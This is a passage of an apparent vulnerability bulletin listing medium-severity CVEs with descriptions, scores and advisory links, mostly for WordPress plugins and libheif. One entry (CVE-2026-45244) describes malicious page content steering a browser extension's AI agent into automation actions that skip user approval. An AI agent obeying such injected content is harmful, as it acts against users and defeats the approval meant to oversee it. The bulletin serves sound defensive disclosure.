https://plugins.trac.wordpress.org/changeset/3538404/soliloquy-lite/trunk/includes/global/posttype.php?old=3395148&old_path=soliloquy-lite%2Ftrunk%2Fincludes%2Fglobal%2Fposttype.php |
| SourceCodester–Hospitals Patient Records Management System | A security flaw has been discovered in SourceCodester Hospitals Patient Records Management System 1.0. Impacted is an unknown function of the file /admin/patients/view_history.php. The manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-23 | 6.3 | CVE-2026-9342 | VDB-365305 | SourceCodester Hospitals Patient Records Management System view_history.php sql injection VDB-365305 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #812834 | sourcecodester Hospital’s Patient Records Management System V1.0 SQL injection https://github.com/july-skyload/exp/issues/1 https://www.sourcecodester.com/ |
| Splunk–Splunk AI Toolkit | In Splunk AI Toolkit versions below 5.7.3, a low-privileged user that does not hold the ‘admin’ or ‘power’ roles could access confidential data that was restricted through `srchFilter` configurations on custom roles.<br><br>The app contains an `authorize.conf` configuration file with a `srchFilter` entry that modifies the built-in ‘user’ role. Because the Splunk platform combines inherited search filters with the `OR` SPL operator, the injected filter overrides more restrictive filters on child roles. | 2026-05-20 | 6.5 | CVE-2026-20238 | https://advisory.splunk.com/advisories/SVD-2026-0502 |
| steipete–summarize | Summarize prior to 0.15.1 contains a missing authorization vulnerability in the content script window.postMessage bridge that allows malicious pages to perform unauthorized operations on automation artifacts. Attackers can simulate runtime messages with spoofed sender identifiers to list, read, create, overwrite, or delete automation artifacts scoped to the affected tab without proper authorization checks. | 2026-05-18 | 6.1 | CVE-2026-45243 | https://github.com/steipete/summarize/releases/tag/v0.15.2 https://github.com/steipete/summarize/pull/222 https://github.com/steipete/summarize/commit/357544063af535bd574752622f9eb94be33ee5fd https://www.vulncheck.com/advisories/summarize-browser-extension-missing-authorization-via-content-script |
| steipete–summarize | Summarize prior to 0.15.1 contains a missing authorization vulnerability that allows attackers to execute browser automation actions without per-call user approval when the extension automation feature is enabled. Attackers can influence the agent through malicious page or summary content to invoke enabled extension automation tools such as navigation or debugger-backed actions, bypassing the final user approval step when a user interacts with attacker-controlled content. | 2026-05-18 | 5.4 | CVE-2026-45244 | https://github.com/steipete/summarize/releases/tag/v0.15.2 https://github.com/steipete/summarize/pull/219 https://github.com/steipete/summarize/commit/e64fe3ecd1bb4fdc181dcfa88c96b9e1914ced0e https://www.vulncheck.com/advisories/summarize-unapproved-browser-automation-execution |
| steipete–summarize | Summarize prior to 0.15.1 contains an insecure file permission vulnerability in the refresh-free configuration rewrite path that allows local users to read sensitive credentials by exploiting default filesystem permissions. When the refresh-free path rewrites the configuration file, it creates the replacement with default process umask permissions instead of preserving the original file permissions, exposing the config file containing API keys and provider credentials to other local users on shared Unix-like systems. | 2026-05-18 | 5.5 | CVE-2026-45246 | https://github.com/steipete/summarize/releases/tag/v0.15.2 https://github.com/steipete/summarize/pull/217 https://github.com/steipete/summarize/commit/9e990193650a23dab73f37d5e1964d574a44098b https://www.vulncheck.com/advisories/summarize-insecure-file-permissions-information-disclosure |
| storybookjs–telejson | TeleJSON prior to 6.0.0 contains a DOM-based cross-site scripting vulnerability in the parse() function that allows attackers to execute arbitrary JavaScript by delivering a crafted JSON payload containing a malicious _constructor-name_ property value. The custom reviver passes the constructor name directly to new Function() without sanitization when recreating object prototypes, enabling attackers to inject arbitrary JavaScript through vectors such as postMessage in cross-frame communication contexts to achieve script execution within the application. | 2026-05-20 | 6.1 | CVE-2026-47099 | https://github.com/storybookjs/telejson/security/advisories/GHSA-ccgf-5rwj-j3hv https://github.com/Niccolo10/Security-Advisories/blob/main/CVE-2026-47099/cve-2026-47099.md https://www.vulncheck.com/advisories/telejson-dom-based-xss-via-parse-function |
| strukturag–libheif | libheif is a HEIF and AVIF file format decoder and encoder. In versions 1.21.2 and below, a crafted 792-byte HEIF sequence file with samples_per_chunk=0 in the stsc box causes an unsigned integer underflow in the Chunk constructor (m_last_sample = 0 + 0 – 1 = UINT32_MAX), mapping all samples to an empty chunk and resulting in a denial of service. When any sample is accessed, the library reads from index 0 of an empty std::vector, causing a guaranteed SEGV (null-page read). The file parses successfully without producing an error; the crash occurs on the first frame access. This issue has been fixed in version 1.22.0. | 2026-05-19 | 6.5 | CVE-2026-32738 | https://github.com/strukturag/libheif/security/advisories/GHSA-7f2h-cmpf-v9ww |
| strukturag–libheif | libheif is a HEIF and AVIF file format decoder and encoder. In versions 1.21.2 and below, a crafted 800-byte HEIF sequence file causes an infinite loop in Box_stts::get_sample_duration(), consuming 100% CPU indefinitely with zero progress, leading to DoS. The loop has no iteration limit or timeout and is triggered during file open (parsing) – before any user interaction or image decoding. The process stays alive (no crash, no error logged), making it invisible to crash-based monitoring. This issue has been fixed in version 1.22.0. | 2026-05-19 | 6.5 | CVE-2026-32739 | https://github.com/strukturag/libheif/security/advisories/GHSA-j9g7-q9hv-gq8c https://github.com/strukturag/libheif/releases/tag/v1.22.0 |
| strukturag–libheif | libheif is a HEIF and AVIF file format decoder and encoder. In versions 1.21.2 and prior, when decoding a HEIF grid image with strict_decoding=false (the default), a corrupted tile silently fails to decode and the library returns heif_error_Ok with no indication of failure, leading to an uninitialized heap memory information leak. The canvas is allocated via create_clone_image_at_new_size() → plane.alloc() → new (std::nothrow) uint8_t[allocation_size] which does not zero the memory; only the alpha plane is explicitly initialized via fill_plane(), so the Y, Cb, and Cr planes contain whatever was previously at that heap address. The failed tile’s region of the canvas is never written. It retains uninitialized heap data that is delivered to the caller as decoded pixel values (4,096 bytes per Y/Cb/Cr plane = 12,288+ bytes total). Any application using libheif to decode grid-based HEIF/AVIF files with default settings is vulnerable: a crafted .heic or .avif file causes 4,096+ bytes of heap memory to appear as pixel values in the decoded image, and the calling application receives heif_error_Ok, so it has no indication the output contains heap garbage. In server-side image processing, an uploaded crafted HEIF decoded and re-encoded (e.g., as PNG/JPEG for thumbnails, CDN, social media) can leak cross-user data such as auth tokens, database results, and other users’ image data. This issue has been fixed in version 1.22.0. | 2026-05-19 | 6.5 | CVE-2026-32814 | https://github.com/strukturag/libheif/security/advisories/GHSA-4m8r-34pg-rvwc https://github.com/strukturag/libheif/releases/tag/v1.22.0 |
| strukturag–libheif | libheif is a HEIF and AVIF file format decoder and encoder. In versions 1.21.2 and prior, a malformed HEIF sequence file can trigger an out-of-bounds read in core sequence parsing logic, causing DoS. A malformed file can have stco.entry_count == 0 (creating no chunks) while still passing validation because saio.entry_count == 0 matches, but with saiz.sample_count > 0 the SampleAuxInfoReader constructor still enters its loop. This leads to an out-of-bounds dereference on the empty chunks[0] in chunked mode. | 2026-05-22 | 6.5 | CVE-2026-41069 | https://github.com/strukturag/libheif/security/advisories/GHSA-p82x-fpmv-576r https://github.com/strukturag/libheif/releases/tag/v1.22.0 |
| submone–Amazon Scraper | The Amazon Scraper plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-20 | 4.3 | CVE-2026-8419 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c956e4c5-bf7e-4ec4-b795-74d477a61694?source=cve https://plugins.trac.wordpress.org/browser/amazon-scraper/trunk/amazon-admin.php#L49 https://plugins.trac.wordpress.org/browser/amazon-scraper/tags/1.1/amazon-admin.php#L49 https://plugins.trac.wordpress.org/browser/amazon-scraper/trunk/amazon-admin.php#L13 https://plugins.trac.wordpress.org/browser/amazon-scraper/tags/1.1/amazon-admin.php#L13 https://plugins.trac.wordpress.org/browser/amazon-scraper/trunk/amazon-admin.php#L26 https://plugins.trac.wordpress.org/browser/amazon-scraper/tags/1.1/amazon-admin.php#L26 https://plugins.trac.wordpress.org/browser/amazon-scraper/trunk/amazon-admin.php#L45 https://plugins.trac.wordpress.org/browser/amazon-scraper/tags/1.1/amazon-admin.php#L45 |
| svil4ok–Bottom Bar | The Bottom Bar plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to and including 0.1.7. This is due to missing nonce verification on the plugin’s settings update forms handled in bottom-bar-admin.php. None of the three settings forms (main settings, sharing services, restore defaults) include a wp_nonce_field(), and the server-side processing code never calls check_admin_referer() or any equivalent nonce validation before processing POST data and calling update_option(). This makes it possible for unauthenticated attackers to trick a logged-in administrator into submitting a crafted request that updates plugin configuration options, such as changing the language, maximum post counts, or enabled sharing services. | 2026-05-20 | 4.3 | CVE-2026-6401 | https://www.wordfence.com/threat-intel/vulnerabilities/id/db0715ed-a06e-4a68-b9c3-408887cae113?source=cve https://plugins.trac.wordpress.org/browser/bottom-bar/trunk/bottom-bar-admin.php#L16 https://plugins.trac.wordpress.org/browser/bottom-bar/tags/0.1.7/bottom-bar-admin.php#L16 https://plugins.trac.wordpress.org/browser/bottom-bar/trunk/bottom-bar-admin.php#L59 https://plugins.trac.wordpress.org/browser/bottom-bar/tags/0.1.7/bottom-bar-admin.php#L59 |
| syslink software AG–Avantra | Use of default password vulnerability in syslink software AG Avantra on Linux, Windows allows Try Common or Default Usernames and Passwords. This issue affects Avantra: before 25.3.0. | 2026-05-22 | 5.1 | CVE-2026-8672 | https://support.avantra.com/hc/en-us/articles/5535551609759 |
| syslink software AG–Avantra | Unprotected transport of credentials vulnerability in syslink software AG Avantra on Linux, Windows allows Sniffing Attacks. This issue affects Avantra: before 25.3.0. | 2026-05-22 | 5.9 | CVE-2026-8673 | https://support.avantra.com/hc/en-us/articles/5535621927071 |
| Talend–Talend Administration Center | A stored cross-site scripting vulnerability has been found in the Talend Administration Center. An attacker with permission to manage servers can store a XSS payload that can be triggered by a different user. | 2026-05-20 | 5.4 | CVE-2026-9056 | https://community.qlik.com/t5/Official-Support-Articles/Security-fix-for-Qlik-Talend-Administration-Center-cross-site/ta-p/2548522 |
| TeamViewer–DEX (On-premises) | A broken access control vulnerability exists in the TeamViewer DEX Platform (On‑Premises) prior version 9.2. Certain backend API endpoints do not correctly enforce authorization checks, allowing an authenticated user with low privileges to perform actions and access resources intended only for higher‑privileged roles. An attacker with low‑privileged credentials may exploit this to gain unauthorized access to administrative or sensitive functionality. | 2026-05-22 | 5.4 | CVE-2026-8381 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2026-1005/ |
| techjewel–FluentCRM Email Newsletter, Automation, Email Marketing, Email Campaigns, Optins, Leads, and CRM Solution | The FluentCRM – Email Newsletter, Automation, Email Marketing, Email Campaigns, Optins, Leads, and CRM Solution plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 2.9.87 via the ‘SubscribeURL’ parameter. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. Exploitation requires that the SES bounce handling key (‘_fc_bounce_key’) has never been stored (i.e., the site is in its default/unconfigured state with respect to SES bounce handling) as visiting the bounce configuration page auto-generates and stores a random key that causes the authentication check to evaluate correctly and reject unauthenticated requests. | 2026-05-22 | 5.4 | CVE-2026-7798 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5c3ca2d7-7af9-401f-bc5a-1796c6253cb0?source=cve https://plugins.trac.wordpress.org/browser/fluent-crm/trunk/app/Hooks/Handlers/ExternalPages.php#L113 https://plugins.trac.wordpress.org/browser/fluent-crm/tags/2.9.87/app/Hooks/Handlers/ExternalPages.php#L113 https://plugins.trac.wordpress.org/browser/fluent-crm/trunk/app/Hooks/Handlers/ExternalPages.php#L85 https://plugins.trac.wordpress.org/browser/fluent-crm/tags/2.9.87/app/Hooks/Handlers/ExternalPages.php#L85 https://plugins.trac.wordpress.org/browser/fluent-crm/trunk/app/Hooks/Handlers/ExternalPages.php#L87 https://plugins.trac.wordpress.org/browser/fluent-crm/tags/2.9.87/app/Hooks/Handlers/ExternalPages.php#L87 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3532271%40fluent-crm&new=3532271%40fluent-crm&sfp_email=&sfph_mail= |
| Technitium–DNS Server | Technitium DNS Server aggressively tries to fetch missing RRSIG records or mismatched DNSKEY records. An attacker in control of a domain can cause a vulnerable system to generate excessive network traffic. Fixed in 15.0. | 2026-05-19 | 5.8 | CVE-2026-45557 | url url url |
| Tencent–WeKnora | A vulnerability has been found in Tencent WeKnora up to 0.3.6. Affected by this issue is the function getKnowledgeBaseForInitialization of the file internal/handler/initialization.go of the component Config API Endpoint. The manipulation of the argument kbId leads to authorization bypass. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-18 | 6.3 | CVE-2026-8786 | VDB-364410 | Tencent WeKnora Config API Endpoint initialization.go getKnowledgeBaseForInitialization authorization VDB-364410 | CTI Indicators (IOB, IOC, IOA) Submit #812172 | Tencent WeKnora <= v0.3.6 Insecure Direct Object Reference (CWE-639) https://gist.github.com/YLChen-007/1cdc50418f29af7ae671466425e52c7b |
| themefusion–Avada (Fusion) Builder | The Avada (Fusion) Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple shortcodes in all versions up to, and including, 3.15.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user (typically an administrator) accesses a page displaying dynamic user data (such as via the Dynamic Data feature pulling user biographical information). | 2026-05-21 | 6.4 | CVE-2026-1543 | https://www.wordfence.com/threat-intel/vulnerabilities/id/72a6b040-ed02-4561-82f2-4adb820bdf7d?source=cve https://themeforest.net/item/avada-responsive-multipurpose-theme/2833226 https://avada.com/documentation/avada-changelog/ |
| Themeisle–Visualizer | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Themeisle Visualizer allows Stored XSS. This issue affects Visualizer: from n/a before 4.0.0. | 2026-05-20 | 6.5 | CVE-2026-24573 | https://patchstack.com/database/wordpress/plugin/visualizer/vulnerability/wordpress-visualizer-plugin-4-0-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| themeum–Kirki Freeform Page Builder, Website Builder & Customizer | The Kirki – Freeform Page Builder, Website Builder & Customizer plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 6.0.6. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to view all Kirki frontend forms and read stored visitor form submission data, including contact details, messages, and any other visitor-provided information submitted through site forms. | 2026-05-19 | 6.5 | CVE-2026-8096 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1a4414b1-6a49-42f8-9927-93763d1502ce?source=cve https://plugins.trac.wordpress.org/browser/kirki/tags/6.0.4/includes/Ajax.php#L675 https://plugins.trac.wordpress.org/changeset/3535640/kirki |
| Tobias–CF7 WOW Styler | Missing Authorization vulnerability in Tobias CF7 WOW Styler allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects CF7 WOW Styler: from n/a through 1.7.6. | 2026-05-21 | 5.3 | CVE-2026-27393 | https://patchstack.com/database/wordpress/plugin/cf7-styler/vulnerability/wordpress-cf7-wow-styler-plugin-1-7-6-broken-access-control-vulnerability?_s_id=cve |
| Trend Micro, Inc.–TrendAI Apex One | A directory traversal vulnerability in the Apex One (on-premise) server could allow a pre-authenticated local attacker to modify a key table on the server to inject malicious code to deploy to agents on affected installations. This vulnerability is only exploitable on the on-premise version of Apex One and a potential attacker must have access to the Apex One Server and already obtained administrative credentials to the server via some other method to exploit this vulnerability. | 2026-05-21 | 6.7 | CVE-2026-34926 | https://success.trendmicro.com/en-US/solution/KA-0023430 https://success.trendmicro.com/ja-JP/solution/KA-0022974 https://jvn.jp/en/vu/JVNVU90583059/ https://www.jpcert.or.jp/english/at/2026/at260014.html |
| TriliumNext–Trilium | Trilium Notes is an open-source, cross-platform hierarchical note taking application for building large personal knowledge bases. Versions 0.102.1 and prior are vulnerable to Local File Inclusion, allowing an authenticated attacker to read sensitive arbitrary files from the server’s filesystem. The uploadModifiedFileToAttachment function, which is called when a POST request is received to /api/attachments/{attachmentId}/upload-modified-file, replaces the content of the attachment with the content from another file (whose path is provided in filePath of Request body). After which the content of the attachment can be viewed at /api/attachments/{attachmentId}/download. This exposes sensitive system files such as SSH keys, credentials, configs, and OS files, potentially leading to remote code execution and compromise of co-hosted applications. This issue has been fixed in version 0.102.2. | 2026-05-19 | 6.8 | CVE-2026-35593 | https://github.com/TriliumNext/Trilium/security/advisories/GHSA-hf4x-22rg-pjjp https://github.com/TriliumNext/Trilium/releases/tag/v0.102.2 |
| TriliumNext–Trilium | Trilium Notes is a cross-platform, hierarchical note taking application focused on building large personal knowledge bases. Versions 0.102.1 and prior contain a critical security flaw where lack of SVG sanitization combined with a disabled Content Security Policy (CSP) and a publicly reachable backend execution API results in an unauthenticated Remote Code Execution (RCE). The vulnerability arises from an insecure-by-design architecture: Trilium serves SVG attachments with the image/svg+xml MIME type without any sanitization, and it explicitly disables Helmet’s Content Security Policy middleware, removing the primary defense against script execution in served assets. Because the malicious SVG runs under the Same-Origin Policy, it can issue a fetch(‘/’) to extract the csrfToken from the document body. With that token, it can send a signed request to /api/script/exec to execute arbitrary Node.js code on the server. An attacker can compromise the entire server instance simply by tricking an authenticated user into viewing a shared SVG attachment. The issue has been fixed in version 0.102.2. | 2026-05-20 | 6.8 | CVE-2026-39311 | https://github.com/TriliumNext/Trilium/security/advisories/GHSA-p837-cxw3-m964 https://github.com/TriliumNext/Trilium/releases/tag/v0.102.2 |
| TriliumNext–Trilium | Trilium Notes is a cross-platform, hierarchical note taking application focused on building large personal knowledge bases. In versions 0.102.1 and prior, the Electron configuration is vulnerable to TCC Bypass via Prompt Spoofing, allowing local attackers to trigger misleading macOS permission prompts by running malicious code under the identity of the trusted app. The root cause is that the RunAsNode fuse allows launching the app in a special Node.js mode using -e to execute arbitrary system commands with Trilium Notes’s permissions and identity. An attacker can leverage this through a subprocess to request any sensitive permissions, such as access to hardware (camera, microphone) and TCC-protected files, causing the TCC system prompt to appear as if the request came from Trilium rather than the attacker’s code, because macOS treats the subprocess as part of the parent application. Exploitation allows access to TCC-protected resources like the screen, camera, microphone, and folders such as ~/Documents and ~/Downloads, undermining macOS’s security model and UI integrity through social engineering. This issue has been fixed in version 0.102.2. | 2026-05-19 | 5.5 | CVE-2026-39309 | https://github.com/TriliumNext/Trilium/security/advisories/GHSA-66pm-8hvq-2wwx https://github.com/TriliumNext/Trilium/releases/tag/v0.102.2 |
| Turkiye Electricity Transmission Corporation (TEA)–Mobile Application | Improper restriction of excessive authentication attempts vulnerability in Turkiye Electricity Transmission Corporation (TEÄ°AÅž) Mobile Application allows Brute Force. This issue affects Mobile Application: from 1.6.2 before 1.13. | 2026-05-21 | 6.3 | CVE-2026-1816 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0286 |
| Turkiye Electricity Transmission Corporation (TEA)–Mobile Application | Insufficient session expiration vulnerability in Turkiye Electricity Transmission Corporation (TEÄ°AÅž) Mobile Application allows Session Hijacking. This issue affects Mobile Application: from 1.6.2 before 1.13. | 2026-05-21 | 5.7 | CVE-2026-1815 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0286 |
| UserSpice–userSpice | userSpice 4.3.24 contains a cross-site scripting vulnerability that allows attackers to inject malicious scripts through the X-Forwarded-For HTTP header. Attackers can send crafted requests to the backup.php endpoint with XSS payloads in the X-Forwarded-For header that execute when administrators visit the audit log page. | 2026-05-23 | 6.1 | CVE-2018-25349 | ExploitDB-44871 VulnCheck Advisory: userSpice 4.3.24 Cross-Site Scripting via X-Forwarded-For Header |
| vatanyazilim–VatanSMS WP SMS | The VatanSMS WP SMS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `page` parameter in all versions up to, and including, 1.01. This is due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link. | 2026-05-20 | 6.1 | CVE-2026-7462 | https://www.wordfence.com/threat-intel/vulnerabilities/id/96ef8459-1600-4ca0-93c6-0ee42f8adabd?source=cve https://plugins.trac.wordpress.org/browser/wp-sms-vatansms-com/trunk/includes/admin/groups/groups.php#L34 https://plugins.trac.wordpress.org/browser/wp-sms-vatansms-com/trunk/includes/admin/outbox/outbox.php#L5 https://plugins.trac.wordpress.org/browser/wp-sms-vatansms-com/trunk/includes/admin/subscribers/subscribers.php#L128 |
| VillaTheme–HAPPY | Missing Authorization vulnerability in VillaTheme HAPPY allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects HAPPY: from n/a through 1.0.10. | 2026-05-21 | 6.5 | CVE-2026-39593 | https://patchstack.com/database/wordpress/plugin/happy-helpdesk-support-ticket-system/vulnerability/wordpress-happy-plugin-1-0-10-broken-access-control-vulnerability?_s_id=cve |
| Webmin–Webmin | Webmin before 2.641 contains a stored cross-site scripting vulnerability in the email template description field of the System and Server Status module that allows low-privileged authenticated attackers to execute arbitrary JavaScript in the browser context of administrators by injecting unsanitized input stored in save_tmpl.cgi and rendered unescaped in list_tmpls.cgi. | 2026-05-21 | 5.4 | CVE-2026-22678 | https://webmin.com/changelog/webmin-2.641-released/ https://www.vulncheck.com/advisories/webmin-stored-xss-via-system-and-server-status |
| winking–Word 2 Cash | The Word 2 Cash plugin for WordPress is vulnerable to Cross-Site Request Forgery leading to Stored Cross-Site Scripting in versions up to and including 0.9.2. This is due to the complete absence of nonce verification on the settings save handler in the w2c_admin() function, combined with missing input sanitization before storage and missing output escaping when rendering the stored value. The w2c-definitions POST parameter is saved raw via update_option() and later echoed without escaping inside a <textarea> element. This makes it possible for unauthenticated attackers to forge a request on behalf of a logged-in administrator, storing arbitrary JavaScript payloads that execute in the WordPress admin panel whenever the settings page is visited. | 2026-05-20 | 6.1 | CVE-2026-6395 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e4c7ca5c-38aa-4413-83eb-29185cca2a74?source=cve https://plugins.trac.wordpress.org/browser/word-2-cash/trunk/word2cash.php#L31 https://plugins.trac.wordpress.org/browser/word-2-cash/tags/0.9.2/word2cash.php#L31 https://plugins.trac.wordpress.org/browser/word-2-cash/trunk/word2cash.php#L20 https://plugins.trac.wordpress.org/browser/word-2-cash/tags/0.9.2/word2cash.php#L20 https://plugins.trac.wordpress.org/browser/word-2-cash/trunk/word2cash.php#L18 https://plugins.trac.wordpress.org/browser/word-2-cash/tags/0.9.2/word2cash.php#L18 |
| WP Chill–Image Photo Gallery Final Tiles Grid | Missing Authorization vulnerability in WP Chill Image Photo Gallery Final Tiles Grid allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Image Photo Gallery Final Tiles Grid: from n/a through 3.6.11. | 2026-05-20 | 4.3 | CVE-2026-27424 | https://patchstack.com/database/wordpress/plugin/final-tiles-grid-gallery-lite/vulnerability/wordpress-image-photo-gallery-final-tiles-grid-plugin-3-6-11-broken-access-control-vulnerability?_s_id=cve |
| wpbean–WPB Floating Menu or Categories Sticky Floating Side Menu & Categories with Icons | The WPB Floating Menu & Categories for WordPress – Sticky Side Menu with Icons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘Icon CSS Class’ category field in all versions up to, and including, 1.0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-21 | 4.9 | CVE-2026-4811 | https://www.wordfence.com/threat-intel/vulnerabilities/id/961702ff-60fb-41ff-99b0-a37ade051083?source=cve https://plugins.trac.wordpress.org/browser/wpb-floating-menu-or-categories/tags/1.0.8/admin/category-icon.php#L41 |
| wpdive–Nexa Blocks Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE | The Nexa Blocks – Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE plugin for WordPress is vulnerable to Server-Side Request Forgery (SSRF) in versions up to and including 1.1.1. This is due to the import_demo() function accepting a user-supplied URL in the demo_json_file POST parameter and passing it directly to wp_remote_get() without any URL validation or restriction against internal or private network destinations. The nexa_blocks_nonce required for the AJAX action is publicly exposed in the HTML source of any frontend page where the plugin is active via wp_localize_script on the enqueue_block_assets hook, effectively making the nonce available to all visitors and bypassing any intended authentication barrier. This makes it possible for unauthenticated attackers to make server-side HTTP requests to arbitrary internal or external destinations, potentially exposing internal services, cloud metadata endpoints such as the AWS instance metadata service, localhost services, and other resources not intended to be publicly accessible. A secondary SSRF vector also exists whereby image URLs extracted from the attacker-controlled JSON response are subsequently fetched via a second wp_remote_get() call, allowing chained exploitation through a crafted JSON payload. | 2026-05-20 | 5.4 | CVE-2026-6394 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b4bb3067-7953-466d-a469-8a101450f133?source=cve https://plugins.trac.wordpress.org/browser/nexa-blocks/trunk/inc/template/template.php#L242 https://plugins.trac.wordpress.org/browser/nexa-blocks/tags/1.1.1/inc/template/template.php#L242 https://plugins.trac.wordpress.org/browser/nexa-blocks/trunk/inc/template/template.php#L236 https://plugins.trac.wordpress.org/browser/nexa-blocks/tags/1.1.1/inc/template/template.php#L236 https://plugins.trac.wordpress.org/browser/nexa-blocks/trunk/inc/classes/enqueue-assets.php#L84 https://plugins.trac.wordpress.org/browser/nexa-blocks/tags/1.1.1/inc/classes/enqueue-assets.php#L84 |
| WPFunnels Team–Mail Mint | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in WPFunnels Team Mail Mint allows Retrieve Embedded Sensitive Data. This issue affects Mail Mint: from n/a through 1.19.5. | 2026-05-21 | 4.3 | CVE-2026-27349 | https://patchstack.com/database/wordpress/plugin/mail-mint/vulnerability/wordpress-mail-mint-plugin-1-19-5-sensitive-data-exposure-vulnerability?_s_id=cve |
| wpxpo–FastX | The FastX theme for WordPress is vulnerable to unauthorized limited plugin installation and activation due to missing capability checks on the ‘ultp_install_callback’ and ‘ultp_activate_callback’ functions in all versions up to, and including, 1.0.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install and activate the PostX plugin. | 2026-05-22 | 4.3 | CVE-2026-2518 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6f5c4194-4f97-4f85-af90-e983ba9ce3a6?source=cve https://themes.trac.wordpress.org/browser/fastx/1.0.2/classes/Initialization.php#L264 https://themes.trac.wordpress.org/browser/fastx/1.0.2/classes/Initialization.php#L249 |
| wupsales–AI Chatbot & Workflow Automation by AIWU | The AI Chatbot & Workflow Automation by AIWU plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘X-Forwarded-For’ header in versions up to, and including, 1.4.14 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: Practical exploitation is constrained due to a 20-character storage limit. | 2026-05-20 | 6.4 | CVE-2026-2955 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8d434250-aa16-4ba1-a1f8-289371176545?source=cve https://plugins.trac.wordpress.org/changeset/3505998/ai-copilot-content-generator |
| xpro–Xpro Addons 140+ Widgets for Elementor | The Xpro Addons – 140+ Widgets for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the get_content_editor function in all versions up to, and including, 1.5.0. This makes it possible for unauthenticated attackers to create published Xpro templates. | 2026-05-20 | 5.3 | CVE-2025-15369 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cf49d3fb-de14-42bc-bf51-f9adceba0d32?source=cve https://plugins.trac.wordpress.org/browser/xpro-elementor-addons/trunk?rev=3508547 |
| yangzongzhuan–RuoYi-Vue | A vulnerability was found in yangzongzhuan RuoYi-Vue up to 3.9.2. Impacted is the function FileUploadUtils.upload of the file /common/upload of the component Common Upload Endpoint. Performing a manipulation results in unrestricted upload. The attack is possible to be carried out remotely. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.3 | CVE-2026-9374 | VDB-365338 | yangzongzhuan RuoYi-Vue Common Upload Endpoint upload FileUploadUtils.upload unrestricted upload VDB-365338 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #813252 | RuoYi RuoYi-Vue 3.9.2 Cross Site Scripting |
| yog2515–General Options | The General Options plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to and including 1.1.0. This is due to the use of sanitize_text_field() for output escaping in the Contact Number (ad_contact_number) field – a function that strips HTML tags but does not encode double-quote characters to their HTML entity equivalent ("). When the stored value is echoed inside a double-quoted HTML attribute (value=”…”), an attacker-supplied double-quote character breaks out of the attribute context. Even with WordPress’s wp_magic_quotes mechanism (which prefixes quotes with a backslash), the resulting ” sequence is NOT treated as an escaped quote by HTML parsers – the backslash is rendered as a literal character and the bare double-quote still closes the attribute. This makes it possible for authenticated attackers with Administrator-level access and above to inject arbitrary web scripts in the admin settings page that will execute whenever any administrator visits the General Options settings page. | 2026-05-20 | 4.4 | CVE-2026-6399 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d29c69bb-4feb-477e-b18f-934ece21aff6?source=cve https://plugins.trac.wordpress.org/browser/general-options/trunk/direct-main.php https://plugins.trac.wordpress.org/browser/general-options/tags/1.1.0/direct-main.php https://plugins.trac.wordpress.org/browser/general-options/trunk/direct-action.php https://plugins.trac.wordpress.org/browser/general-options/tags/1.1.0/direct-action.php |
| ZTE–MU5250 | There is an unauthorized access vulnerability in ZTE MU5250. Due to improper permission control of the Web interface, an unauthorized attacker can modify configuration through the interface. | 2026-05-19 | 6.3 | CVE-2026-44408 | https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/2657904255874650158 |
